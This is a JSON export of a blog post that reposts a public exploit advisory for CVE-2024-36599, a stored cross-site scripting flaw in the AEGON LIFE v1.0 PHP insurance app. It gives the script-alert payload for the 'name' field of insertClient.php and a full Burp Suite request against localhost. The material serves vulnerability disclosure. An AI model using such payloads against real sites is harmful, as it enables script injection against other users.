{"id":57501,"date":"2024-06-14T17:50:19","date_gmt":"2024-06-14T14:50:19","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179088\/aegonlife10-xss.txt"},"modified":"2024-06-14T17:50:19","modified_gmt":"2024-06-14T14:50:19","slug":"aegon-life-1-0-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/aegon-life-1-0-cross-site-scripting\/","title":{"rendered":"AEGON LIFE 1.0 Cross Site Scripting"},"content":{"rendered":"<p># Exploit Title: Life Insurance Management Stored System- cross-site scripting (XSS)<br \/># Exploit Author: Aslam Anwar Mahimkar<br \/># Date: 18-05-2024<br \/># Category: Web application<br \/># Vendor Homepage: https:\/\/projectworlds.in\/<br \/># Software Link: https:\/\/projectworlds.in\/life-insurance-management-system-in-php\/<br \/># Version: AEGON LIFE v1.0<br \/># Tested on: Linux<br \/># CVE: CVE-2024-36599<\/p>\n<p># Description:<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;-<\/p>\n<p>A stored cross-site scripting (XSS) vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary web scripts via a crafted payload injected into the name parameter at insertClient.php.<\/p>\n<p># Payload:<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;-<\/p>\n<p>&lt;script&gt;alert(document.domain)&lt;\/script&gt;<\/p>\n<p># Attack Vectors:<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<\/p>\n<p>To exploit this vulnerability use &lt;script&gt;alert(document.domain)&lt;\/script&gt; when user visit Client.php we can see the XSS.<\/p>\n<p># Burp Suite Request:<br \/>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;-<\/p>\n<p>POST \/lims\/insertClient.php HTTP\/1.1<br \/>Host: localhost<br \/>Content-Length: 30423<br \/>Cache-Control: max-age=0<br \/>sec-ch-ua: &#8220;Not-A.Brand&#8221;;v=&#8221;99&#8243;, &#8220;Chromium&#8221;;v=&#8221;124&#8243;<br \/>sec-ch-ua-mobile: ?0<br \/>sec-ch-ua-platform: &#8220;Linux&#8221;<br \/>Upgrade-Insecure-Requests: 1<br \/>Origin: http:\/\/localhost<br \/>Content-Type: multipart\/form-data; boundary=&#8212;-WebKitFormBoundarymKfAe0x95923LzQH<br \/>User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/124.0.6367.60 Safari\/537.36<br \/>Accept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7<br \/>Sec-Fetch-Site: same-origin<br \/>Sec-Fetch-Mode: navigate<br \/>Sec-Fetch-User: ?1<br \/>Sec-Fetch-Dest: document<br \/>Referer: http:\/\/localhost\/lims\/addClient.php<br \/>Accept-Encoding: gzip, deflate, br<br \/>Accept-Language: en-US,en;q=0.9<br \/>Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78n<br \/>Connection: close<\/p>\n<p>&#8212;&#8212;WebKitFormBoundarymKfAe0x95923LzQH<br \/>Content-Disposition: form-data; name=&#8221;client_id&#8221;<\/p>\n<p>1716051159<\/p>\n<p>&#8212;&#8212;WebKitFormBoundarymKfAe0x95923LzQH<br \/>Content-Disposition: form-data; name=&#8221;client_password&#8221;<\/p>\n<p>password<\/p>\n<p>&#8212;&#8212;WebKitFormBoundarymKfAe0x95923LzQH<br \/>Content-Disposition: form-data; name=&#8221;name&#8221;<\/p>\n<p>&lt;script&gt;alert(document.domain)&lt;\/script&gt;<\/p>\n<p>&#8212;&#8212;WebKitFormBoundarymKfAe0x95923LzQH<br \/>Content-Disposition: form-data; name=&#8221;fileToUpload&#8221;; filename=&#8221;runme.jpg_original&#8221;<\/p>\n<p>Content-Type: application\/octet-stream<\/p>\n<p>\u00ff\u00d8\u00ff\u00e0<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Life Insurance Management Stored System- cross-site scripting (XSS)# Exploit Author: Aslam Anwar Mahimkar# Date: 18-05-2024# Category: Web application# Vendor Homepage: https:\/\/projectworlds.in\/# Software Link: https:\/\/projectworlds.in\/life-insurance-management-system-in-php\/# Version: AEGON LIFE v1.0# Tested on: Linux# CVE: CVE-2024-36599 # Description:&#8212;&#8212;&#8212;&#8212;&#8212;- A stored cross-site scripting (XSS) vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary web scripts &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-57501","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57501","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=57501"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57501\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=57501"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=57501"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=57501"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}